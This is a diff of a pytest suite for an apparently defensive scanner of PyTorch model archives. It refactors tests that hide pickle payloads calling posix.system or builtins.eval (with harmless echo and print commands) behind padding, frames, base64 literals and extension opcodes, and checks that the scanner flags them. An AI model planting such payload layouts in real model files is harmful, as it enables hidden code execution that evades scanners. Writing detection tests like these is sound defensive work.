storage_reference = _pytorch_storage_binpersid_expr( key="0", storage_name="ByteStorage", @@ -5028,12 +4520,12 @@ def encoded_key(value: str) -> bytes: "unsupported_additems": b"\x8f(" + storage_reference + b"\x900h\x01.", "append_wrong_target": storage_reference + b"K\x00ah\x01.", "setitem_storage_target": storage_reference + b"K\x00K\x01sh\x01.", - "append_value": encoded_key("converted") + b"K\x00" + storage_reference + b"as.", - "appends_value": encoded_key("converted") + b"K\x00(" + storage_reference + b"es.", - "setitem_value": encoded_key("converted") + b"K\x00" + encoded_key("slot") + storage_reference + b"ss.", - "setitem_key": encoded_key("converted") + b"K\x00" + storage_reference + b"K\x00ss.", - "stackglobal_name": encoded_key("converted") + _short_binunicode(b"fake") + storage_reference + b"\x93s.", - "stackglobal_module": encoded_key("converted") + storage_reference + _short_binunicode(b"fake") + b"\x93s.", + "append_value": _encoded_key("converted") + b"K\x00" + storage_reference + b"as.", + "appends_value": _encoded_key("converted") + b"K\x00(" + storage_reference + b"es.", + "setitem_value": _encoded_key("converted") + b"K\x00" + _encoded_key("slot") + storage_reference + b"ss.", + "setitem_key": _encoded_key("converted") + b"K\x00" + storage_reference + b"K\x00ss.", + "stackglobal_name": _encoded_key("converted") + _short_binunicode(b"fake") + storage_reference + b"\x93s.", + "stackglobal_module": _encoded_key("converted") + storage_reference + _short_binunicode(b"fake") + b"\x93s.", } payload = ( b"\x80\x04" @@ -5086,17 +4578,13 @@ def test_scan_file_preserves_hidden_malicious_storage_after_compacted_batch_disc archive_path = tmp_path / f"malicious-compacted-discard-{discard_opcode.hex()}.pt" hidden_payload = b"S'" + b"A" * 5000 + b"'\n0cos\nsystem\n(S'echo compacted-storage'\ntR." - def encoded_key(value: str) -> bytes: - raw = value.encode("ascii") - return b"X" + len(raw).to_bytes(4, "little") + raw - tensor = ( _pytorch_rebuild_tensor_v2_payload(key="0", storage_name="ByteStorage", element_count=len(hidden_payload)) .removeprefix(b"\x80\x04") .removesuffix(b".") ) - entries = [encoded_key("weight") + tensor] - entries.extend(encoded_key(f"metadata_{index}") + b"K\x01" for index in range(600)) + entries = [_encoded_key("weight") + tensor] + entries.extend(_encoded_key(f"metadata_{index}") + b"K\x01" for index in range(600)) payload = b"\x80\x04}q\x01(" + b"".join(entries) + discard_opcode + b"0h\x01." with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", payload) @@ -5944,6 +5432,42 @@ def test_scan_file_does_not_route_yolov5n6_storage_prefix_as_hidden_pickle(tmp_p def test_scan_file_scans_trailing_pickle_after_yolov5n6_scalar_prefix(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" storage_blob = _yolov5n6_tensor_storage_prefix_bytes()[:4] + b"cposix\nsystem\n(S'echo hidden'\ntR." + _assert_storage_pickle_detected(archive_path, storage_blob) + + +def test_scan_file_scans_binary_pickle_after_trivial_scalar_prefix(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + storage_blob = b"N." + pickle.dumps(MaliciousPayload(), protocol=4) + _assert_storage_pickle_detected(archive_path, storage_blob) + + +def test_scan_file_scans_binary_pickle_opcode_crossing_trusted_probe_boundary(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + storage_blob = b"N." + (b" " * 4093) + pickle.dumps(MaliciousPayload(), protocol=4) + _assert_storage_pickle_detected(archive_path, storage_blob) + + +def test_scan_file_scans_short_binunicode_crossing_trusted_probe_boundary(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + storage_blob = b"N." + (b" " * 4093) + b"\x8c\x03abc" + b"cposix\nsystem\n(S'echo hidden'\ntR." + _assert_storage_pickle_detected(archive_path, storage_blob) + + +def test_scan_file_scans_binint_crossing_trusted_probe_boundary(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + storage_blob = b"N." + (b" " * 4093) + b"J" + (1).to_bytes(4, "little") + b"cposix\nsystem\n(S'echo hidden'\ntR." + _assert_storage_pickle_detected(archive_path, storage_blob) + + +def test_scan_file_scans_protocol0_int_crossing_trusted_probe_boundary(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + storage_blob = b"N." + (b" " * 4092) + b"I1\n." + b"cposix\nsystem\n(S'echo hidden'\ntR." + _assert_storage_pickle_detected(archive_path, storage_blob) + + +def test_scan_file_scans_extension_opcode_crossing_trusted_probe_boundary(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + storage_blob = b"N." + (b" " * 4093) + b"\x82\x01." storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -5953,19 +5477,28 @@ def test_scan_file_scans_trailing_pickle_after_yolov5n6_scalar_prefix(tmp_path: report = scan_file(archive_path) - assert report.verdict == SafetyVerdict.MALICIOUS + assert report.verdict == SafetyVerdict.SUSPICIOUS assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] assert any( - finding.rule_code == "DANGEROUS_CALL" + finding.rule_code == "EXTENSION_REF" and finding.location is not None and f"{archive_path}:archive/data/0" in finding.location for finding in report.findings ) -def test_scan_file_scans_binary_pickle_after_trivial_scalar_prefix(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"N." + pickle.dumps(MaliciousPayload(), protocol=4) +def test_scan_file_routes_encoded_extension_with_truncated_operand(tmp_path: Path) -> None: + _assert_encoded_extension_routes(tmp_path, "truncated-extension-operand.pt", b"S'ggFxAIwFeA=='\n.") + + +def test_scan_file_routes_encoded_extension_with_live_mark_context(tmp_path: Path) -> None: + _assert_encoded_extension_routes(tmp_path, "live-mark-extension.pt", b"S'KE4wggEpb/8='\n.") + + +def test_scan_file_routes_encoded_extension_operand_cut_after_recovered_mark(tmp_path: Path) -> None: + archive_path = tmp_path / "recovered-mark-extension-boundary.pt" + nested_payload = b"(" + (b"N" * (package_api._MAX_RAW_NESTED_PICKLE_CANDIDATE_BYTES - 2)) + b"\x82\x01)R." + storage_blob = _proto0_string_literal(base64.b64encode(nested_payload)) storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -5975,19 +5508,14 @@ def test_scan_file_scans_binary_pickle_after_trivial_scalar_prefix(tmp_path: Pat report = scan_file(archive_path) - assert report.verdict == SafetyVerdict.MALICIOUS + assert report.verdict != SafetyVerdict.CLEAN assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) -def test_scan_file_scans_binary_pickle_opcode_crossing_trusted_probe_boundary(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"N." + (b" " * 4093) + pickle.dumps(MaliciousPayload(), protocol=4) +def test_scan_file_routes_nested_mark_extension_context(tmp_path: Path) -> None: + archive_path = tmp_path / "nested-mark-extension.pt" + payload = b"(N(N10\x82\x01)o\xff" + storage_blob = b"C" + bytes([len(payload)]) + payload + b"." storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -5997,19 +5525,21 @@ def test_scan_file_scans_binary_pickle_opcode_crossing_trusted_probe_boundary(tm report = scan_file(archive_path) - assert report.verdict == SafetyVerdict.MALICIOUS + assert report.status == ScanStatus.INCONCLUSIVE + assert report.verdict != SafetyVerdict.CLEAN assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) -def test_scan_file_scans_short_binunicode_crossing_trusted_probe_boundary(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"N." + (b" " * 4093) + b"\x8c\x03abc" + b"cposix\nsystem\n(S'echo hidden'\ntR." +@pytest.mark.parametrize( + "payload", + [ + b"\x82\x01q\x00\xff", + (b"N." * 70) + b"(\x82\x01)R\xff", + ], +) +def test_scan_file_routes_encoded_extension_fail_closed_suffixes(tmp_path: Path, payload: bytes) -> None: + archive_path = tmp_path / "extension-fail-closed-suffix.pt" + storage_blob = b"S'" + base64.b64encode(payload) + b"'\n." storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -6019,19 +5549,24 @@ def test_scan_file_scans_short_binunicode_crossing_trusted_probe_boundary(tmp_pa report = scan_file(archive_path) - assert report.verdict == SafetyVerdict.MALICIOUS + assert report.status == ScanStatus.INCONCLUSIVE + assert report.verdict != SafetyVerdict.CLEAN assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) -def test_scan_file_scans_binint_crossing_trusted_probe_boundary(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"N." + (b" " * 4093) + b"J" + (1).to_bytes(4, "little") + b"cposix\nsystem\n(S'echo hidden'\ntR." +@pytest.mark.parametrize( + "payload", + [ + b"(" * 20 + b"\xff" + (b"\x82\x01\xff" * 4) + b"\x82\x01)R.", + (b"(" * 10) + b"\xff" + (b"\x82\x01\xff" * 10) + b"cposix\nsystem\n)R.", + ], +) +def test_scan_file_preserves_later_payload_after_exhausted_extension_context( + tmp_path: Path, + payload: bytes, +) -> None: + archive_path = tmp_path / "extension-exhausted-context-later-payload.pt" + storage_blob = b"C" + bytes([len(payload)]) + payload + b"." storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -6042,233 +5577,22 @@ def test_scan_file_scans_binint_crossing_trusted_probe_boundary(tmp_path: Path) report = scan_file(archive_path) assert report.verdict == SafetyVerdict.MALICIOUS + assert any(finding.rule_code == "DANGEROUS_CALL" for finding in report.findings) assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) -def test_scan_file_scans_protocol0_int_crossing_trusted_probe_boundary(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"N." + (b" " * 4092) + b"I1\n." + b"cposix\nsystem\n(S'echo hidden'\ntR." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_scans_extension_opcode_crossing_trusted_probe_boundary(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"N." + (b" " * 4093) + b"\x82\x01." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.SUSPICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "EXTENSION_REF" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_routes_encoded_extension_with_truncated_operand(tmp_path: Path) -> None: - archive_path = tmp_path / "truncated-extension-operand.pt" - storage_blob = b"S'ggFxAIwFeA=='\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.status == ScanStatus.INCONCLUSIVE - assert report.verdict == SafetyVerdict.UNKNOWN - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - - -def test_scan_file_routes_encoded_extension_with_live_mark_context(tmp_path: Path) -> None: - archive_path = tmp_path / "live-mark-extension.pt" - storage_blob = b"S'KE4wggEpb/8='\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.status == ScanStatus.INCONCLUSIVE - assert report.verdict == SafetyVerdict.UNKNOWN - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - - -def test_scan_file_routes_encoded_extension_operand_cut_after_recovered_mark(tmp_path: Path) -> None: - archive_path = tmp_path / "recovered-mark-extension-boundary.pt" - nested_payload = b"(" + (b"N" * (package_api._MAX_RAW_NESTED_PICKLE_CANDIDATE_BYTES - 2)) + b"\x82\x01)R." - storage_blob = _proto0_string_literal(base64.b64encode(nested_payload)) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict != SafetyVerdict.CLEAN - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - - -def test_scan_file_routes_nested_mark_extension_context(tmp_path: Path) -> None: - archive_path = tmp_path / "nested-mark-extension.pt" - payload = b"(N(N10\x82\x01)o\xff" - storage_blob = b"C" + bytes([len(payload)]) + payload + b"." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.status == ScanStatus.INCONCLUSIVE - assert report.verdict != SafetyVerdict.CLEAN - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - - -@pytest.mark.parametrize( - "payload", - [ - b"\x82\x01q\x00\xff", - (b"N." * 70) + b"(\x82\x01)R\xff", - ], -) -def test_scan_file_routes_encoded_extension_fail_closed_suffixes(tmp_path: Path, payload: bytes) -> None: - archive_path = tmp_path / "extension-fail-closed-suffix.pt" - storage_blob = b"S'" + base64.b64encode(payload) + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.status == ScanStatus.INCONCLUSIVE - assert report.verdict != SafetyVerdict.CLEAN - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - - -@pytest.mark.parametrize( - "payload", - [ - b"(" * 20 + b"\xff" + (b"\x82\x01\xff" * 4) + b"\x82\x01)R.", - (b"(" * 10) + b"\xff" + (b"\x82\x01\xff" * 10) + b"cposix\nsystem\n)R.", - ], -) -def test_scan_file_preserves_later_payload_after_exhausted_extension_context( - tmp_path: Path, - payload: bytes, -) -> None: - archive_path = tmp_path / "extension-exhausted-context-later-payload.pt" - storage_blob = b"C" + bytes([len(payload)]) + payload + b"." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert any(finding.rule_code == "DANGEROUS_CALL" for finding in report.findings) - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - - -def test_scan_file_scans_repeated_trivial_prefix_crossing_trusted_probe_boundary(tmp_path: Path) -> None: +def test_scan_file_scans_repeated_trivial_prefix_crossing_trusted_probe_boundary(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" storage_blob = b"N.N." + (b" " * (4096 - 4 - 5)) + b"cposix\nsystem\n(S'echo hidden'\ntR." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + _assert_storage_pickle_detected(archive_path, storage_blob) def test_scan_file_skips_padding_only_expanded_probe(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"N." + (b"\x00" * 70_002) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.status == ScanStatus.COMPLETE - assert report.verdict == SafetyVerdict.CLEAN - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] - assert not any(finding.location is not None and "archive/data/0" in finding.location for finding in report.findings) + _assert_expanded_padding_unrecognized(tmp_path, 70_002) def test_scan_file_skips_oversized_nul_padding_storage_near_match(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"N." + (b"\x00" * 300_002) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.status == ScanStatus.COMPLETE - assert report.verdict == SafetyVerdict.CLEAN - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] - assert not any(finding.location is not None and "archive/data/0" in finding.location for finding in report.findings) + _assert_expanded_padding_unrecognized(tmp_path, 300_002) def test_scan_file_scans_malicious_pickle_after_oversized_nul_padding(tmp_path: Path) -> None: @@ -6486,10 +5810,113 @@ def test_scan_file_scans_raw_nested_binary_prefix_at_padding_probe_boundary(tmp_ ) -def test_scan_file_scans_binary_pickle_after_mixed_padding_trivial_prefix(tmp_path: Path) -> None: +@pytest.mark.parametrize( + ("prefix", "padding", "count", "payload", "alignment"), + [ + pytest.param( + b"N.", + b"\xff\xfe", + 3000, + b"cbuiltins\neval\n(S'print(1)'\ntR.", + b"\x00", + id="test_scan_file_scans_binary_pickle_after_mixed_padding_trivial_prefix", + ), + pytest.param( + b"N.", + b" ", + 4094, + b"cposix\nsystem\n(S'echo hidden'\ntR.", + b" ", + id="test_scan_file_scans_pickle_after_padding_at_trusted_probe_boundary", + ), + pytest.param( + b"N.", + b" ", + 50000, + b"cposix\nsystem\n(S'echo hidden'\ntR.", + b" ", + id="test_scan_file_scans_pickle_after_large_padding_past_trusted_probe_boundary", + ), + pytest.param( + b"N.", + b" ", + 65536, + b"cposix\nsystem\n(S'echo hidden'\ntR.", + b" ", + id="test_scan_file_scans_pickle_after_expanded_text_padding_prefix", + ), + pytest.param( + b"N.", + b"\x00", + 65536, + b"cposix\nsystem\n(S'echo hidden'\ntR.", + b" ", + id="test_scan_file_scans_pickle_after_expanded_nul_padding_prefix", + ), + pytest.param( + b"N.", + b"N", + 4094, + b"cposix\nsystem\n(S'echo hidden'\ntR.", + b" ", + id="test_scan_file_scans_pickle_after_unfinished_trivial_opcode_run", + ), + pytest.param( + b"N.", + b"I1\n.", + 1200, + b"cposix\nsystem\n(S'echo hidden'\ntR.", + b" ", + id="test_scan_file_scans_pickle_after_many_trivial_int_streams", + ), + pytest.param( + b"N.", + b"\xff", + 4094, + b"cposix\nsystem\n(S'echo hidden'\ntR.", + b" ", + id="test_scan_file_scans_after_long_malformed_separator_trusted_probe_prefix", + ), + pytest.param( + b"N.", + b"\xff", + 65536, + b"cposix\nsystem\n(S'echo hidden'\ntR.", + b" ", + id="test_scan_file_scans_after_expanded_malformed_separator_prefix", + ), + pytest.param( + b"C\x06benign.", + b" ", + 5000, + b"cposix\nsystem\n)R.", + b" ", + id="test_scan_file_routes_padded_headerless_byte_literal_storage", + ), + pytest.param( + b"N.#", + b"N.", + 1200, + b"cposix\nsystem\n(S'echo hidden'\ntR.", + b" ", + id="test_scan_file_scans_comment_prefixed_pickle_after_many_trivial_streams", + ), + pytest.param( + b"N.", + b"I1\n.", + 1200, + b"#cposix\nsystem\n(S'echo hidden'\ntR.", + b" ", + id="test_scan_file_scans_comment_prefixed_pickle_after_many_proto0_int_streams", + ), + ], +) +def test_scan_file_scans_pickle_after_storage_prefix( + tmp_path: Path, prefix: bytes, padding: bytes, count: int, payload: bytes, alignment: bytes +) -> None: archive_path = tmp_path / "model.pt" - storage_blob = b"N." + (b"\xff\xfe" * 3000) + b"cbuiltins\neval\n(S'print(1)'\ntR." - storage_blob += b"\x00" * (-len(storage_blob) % 4) + storage_blob = prefix + (padding * count) + payload + storage_blob += alignment * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) archive.writestr("archive/version", "3\n") @@ -6567,23 +5994,7 @@ def test_scan_file_scans_length_operand_crossing_trusted_probe_boundary(tmp_path storage_blob = ( b"N." + (b" " * 4093) + b"X" + (3).to_bytes(4, "little") + b"abc" + b"cposix\nsystem\n(S'echo hidden'\ntR." ) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + _assert_storage_pickle_detected(archive_path, storage_blob) def test_scan_file_marks_oversized_length_operand_inconclusive(tmp_path: Path) -> None: @@ -6615,23 +6026,7 @@ def test_scan_file_scans_frame_header_crossing_trusted_probe_boundary(tmp_path: frame_body = b"cposix\nsystem\n(S'echo hidden'\ntR." frame = b"\x95" + len(frame_body).to_bytes(8, "little") + frame_body storage_blob = b"N." + (b" " * 4086) + frame - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + _assert_storage_pickle_detected(archive_path, storage_blob) def test_scan_file_scans_frame_payload_crossing_trusted_probe_boundary(tmp_path: Path) -> None: @@ -6639,23 +6034,7 @@ def test_scan_file_scans_frame_payload_crossing_trusted_probe_boundary(tmp_path: frame_body = b"cposix\nsystem\n(S'echo hidden'\ntR." frame = b"\x95" + len(frame_body).to_bytes(8, "little") + frame_body storage_blob = b"N." + (b" " * (4096 - 2 - 9)) + frame - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + _assert_storage_pickle_detected(archive_path, storage_blob) def test_scan_file_scans_second_frame_header_crossing_trusted_probe_boundary(tmp_path: Path) -> None: @@ -6689,23 +6068,7 @@ def test_scan_file_scans_frame_first_trivial_pickle_before_large_padding(tmp_pat storage_blob = b"\x95" + (2).to_bytes(8, "little") + b"N." storage_blob += b" " * 5000 storage_blob += b"cposix\nsystem\n(S'echo hidden'\ntR." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + _assert_storage_pickle_detected(archive_path, storage_blob) def test_scan_file_marks_oversized_frame_payload_inconclusive(tmp_path: Path) -> None: @@ -6733,73 +6096,30 @@ def test_scan_file_scans_security_opcode_ending_at_trusted_probe_boundary(tmp_pa archive_path = tmp_path / "model.pt" global_opcode = b"cbuiltins\neval\n" storage_blob = b"N." + (b" " * (4096 - 2 - len(global_opcode))) + global_opcode + b"(S'echo hidden'\ntR." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + _assert_storage_pickle_detected(archive_path, storage_blob) def test_scan_file_scans_after_second_trivial_stream_crossing_trusted_probe_boundary(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" storage_blob = b"N.I1\n." + (b" " * (4096 - len(b"N.I1\n.") - 5)) + b"cposix\nsystem\n(S'echo hidden'\ntR." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + _assert_storage_pickle_detected(archive_path, storage_blob) def test_scan_file_scans_long_string_trailing_pickle_after_trivial_scalar_prefix(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" storage_blob = b"N.S'" + (b"A" * 4200) + b"'\n" + b"cposix\nsystem\n(S'echo hidden'\ntR." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + _assert_storage_pickle_detected(archive_path, storage_blob) def test_scan_file_scans_long_global_operand_crossing_trusted_probe_boundary(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" 